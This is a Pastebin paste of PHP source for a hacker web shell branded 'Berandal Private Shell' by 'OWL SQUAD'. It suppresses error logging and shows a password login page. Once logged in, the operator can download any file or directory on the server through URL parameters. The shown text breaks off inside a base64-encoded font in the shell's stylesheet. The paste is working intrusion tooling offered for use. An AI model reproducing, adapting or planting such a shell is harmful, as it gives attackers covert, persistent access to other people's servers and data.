SHARE
TWEET

decode berandal

a guest Jun 18th, 2017 624 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. <?php
  2. session_start();
  3. error_reporting(0);
  4. set_time_limit(0);
  5. @set_magic_quotes_runtime(0);
  6. @clearstatcache();
  7. @ini_set('error_log',NULL);
  8. @ini_set('log_errors',0);
  9. @ini_set('max_execution_time',0);
  10. @ini_set('output_buffering',0);
  11. @ini_set('display_errors', 0);
  12.  
  13. $auth_pass = "2306938905950a984b1fbdadfcfd86cfbb76b631";
  14. $color = "#00ff00";
  15. $default_action = 'FilesMan';
  16. $default_use_ajax = true;
  17. $default_charset = 'UTF-8';
  18.  
  19. function mlebu_shell() {
  20. ?>
  21. <html>
  22. <head>
  23. <title>Welcome :)</title>
  24. <style type="text/css">
  25. html {
  26.     margin: 20px auto;
  27.     background:black;
  28.     color: green;
  29.     text-align: center;
  30. }
  31. img {
  32. onmousedown:stop;
  33. animation-name: rotate ;
  34. animation-duration: 5s;
  35. animation-play-state: running;
  36. animation-timing-function: linear;
  37. animation-iteration-count: infinite;
  38. opacity: 1.0;filter: alpha(opacity=50);} img:hover {opacity: 1.0;filter: alpha(opacity=100);}
  39.  
  40. @keyframes rotate{
  41. 10% {transform:rotateY(36deg)}
  42. 20% {transform:rotateY(72deg)}
  43. 30% {transform:rotateY(108deg)}
  44. 40% {transform:rotateY(144deg)}
  45. 50% {transform:rotateY(180deg)}
  46. 60% {transform:rotateY(216deg)}
  47. 70% {transform:rotateY(252deg)}
  48. 80% {transform:rotateY(288deg)}
  49. 90% {transform:rotateY(324deg)}
  50. 100% {transform:rotateY(360deg)}
  51. }
  52. pre {
  53.     color: white;
  54.  
  55. }
  56. header {
  57.     color: green;
  58.     margin: 10px auto;
  59. }
  60. input[type=password] {
  61.     width: 200px;
  62.     height: 25px;
  63.     color: white;
  64.     background: black;
  65.     border: 1px;
  66.     padding: 5px;
  67.     margin-left: 20px;
  68.     text-align: center;
  69. }
  70.  
  71. .kedip {
  72. -webkit-animation-name: blinker;
  73. -webkit-animation-duration: 3s;
  74. -webkit-animation-timing-function: linear;
  75. -webkit-animation-iteration-count: infinite;
  76.  
  77. -moz-animation-name: blinker;
  78. -moz-animation-duration: 2s;
  79. -moz-animation-timing-function: linear;
  80. -moz-animation-iteration-count: infinite;
  81.  
  82.  animation-name: blinker;
  83.  animation-duration: 1s;
  84.  animation-timing-function: linear;
  85.  animation-iteration-count: infinite;
  86.  color: white;
  87. }
  88. @-moz-keyframes blinker {  
  89.  0% { opacity: 1.0; }
  90.  50% { opacity: 0.0; }
  91.  100% { opacity: 1.0; }
  92.  }
  93. @-webkit-keyframes blinker {  
  94.  0% { opacity: 1.0; }
  95.  50% { opacity: 0.0; }
  96.  100% { opacity: 1.0; }
  97.  }
  98. @keyframes blinker {  
  99.  0% { opacity: 1.0; }
  100.  50% { opacity: 0.0; }
  101.  100% { opacity: 1.0; }
  102.  }
  103. </style>
  104. </head>
  105. <center>
  106. <header>
  107. <img src='http://img06.deviantart.net/fd51/i/2016/353/0/a/15554682_1888186958078148_1747269681_n_by_owlsquad-das4abn.png'>
  108. <br>
  109. <pre class='kedip'>                                          
  110. ________  __      __.____         _________________   ____ ___  _____  ________    
  111. \_____  \/  \    /  \    |       /   _____/\_____  \ |    |   \/  _  \ \______ \  
  112.  /   |   \   \/\/   /    |       \_____  \  /  / \  \|    |   /  /_\  \ |    |  \  
  113. /    |    \        /|    |___    /        \/   \_/.  \    |  /    |    \|   -`   \
  114. \_______  /\__/\  / |_______ \  /_______  /\_____\ \_/______/\____|__  /_______  /
  115.         \/      \/          \/          \/        \__>               \/        \/  
  116. </pre>
  117. <form method="post">
  118. <input type="password" name="pass">
  119. </form>
  120. <?php
  121. exit;
  122. }
  123. if(!isset($_SESSION[sha1($_SERVER['HTTP_HOST'])]))
  124.     if( empty($auth_pass) || ( isset($_POST['pass']) && (sha1($_POST['pass']) == $auth_pass) ) )
  125.         $_SESSION[sha1($_SERVER['HTTP_HOST'])] = true;
  126.     else
  127.         mlebu_shell();
  128. if(isset($_GET['file']) && ($_GET['file'] != '') && ($_GET['act'] == 'download')) {
  129.     @ob_clean();
  130.     $file = $_GET['file'];
  131.     header('Content-Description: File Transfer');
  132.     header('Content-Type: application/octet-stream');
  133.     header('Content-Disposition: attachment; filename="'.basename($file).'"');
  134.     header('Expires: 0');
  135.     header('Cache-Control: must-revalidate');
  136.     header('Pragma: public');
  137.     header('Content-Length: ' . filesize($file));
  138.     readfile($file);
  139.     exit;
  140. }
  141. if(isset($_GET['dir']) && ($_GET['dir'] != '') && ($_GET['act'] == 'download_dir')) {
  142.     @ob_clean();
  143.     $dir = $_GET['dir'];
  144.     header('Content-Description: File Transfer');
  145.     header('Content-Type: application/octet-stream');
  146.     header('Content-Disposition: attachment; filename="'.basename($dir).'"');
  147.     header('Expires: 0');
  148.     header('Cache-Control: must-revalidate');
  149.     header('Pragma: public');
  150.     header('Content-Length: ' . filesize($file));
  151.     readfile($file);
  152.     exit;
  153. }
  154. ?>
  155. <html>
  156. <head>
  157. <center>
  158. <link rel="SHORTCUT ICON" href="http://img06.deviantart.net/fd51/i/2016/353/0/a/15554682_1888186958078148_1747269681_n_by_owlsquad-das4abn.png" type="image/gif">
  159. <title>Berandal Private Shell</title>
  160. <meta name="viewport" content="width=device-width, initial-scale=1.0">
  161. <meta content='text/html; charset=UTF-8' http-equiv='Content-Type'/>
  162. <meta name="keywords" content="OWL SQUAD, hack, deface, exploit, Berandal, bug, security"/>
  163. <meta name="description" content="OWL SQUAD | Berandal">
  164. <meta name="author" content="OWL SQUAD | Berandal">
  165. <meta name="googlebot" content="all,index,follow">
  166. <meta name="robots" content="index, follow">
  167. <center><style type='text/css'>
  168. @font-face {
  169.     font-family: 'ubuntu_monoregular';
  170.     src: url(data:application/x-font-woff;charset=utf-8;base64,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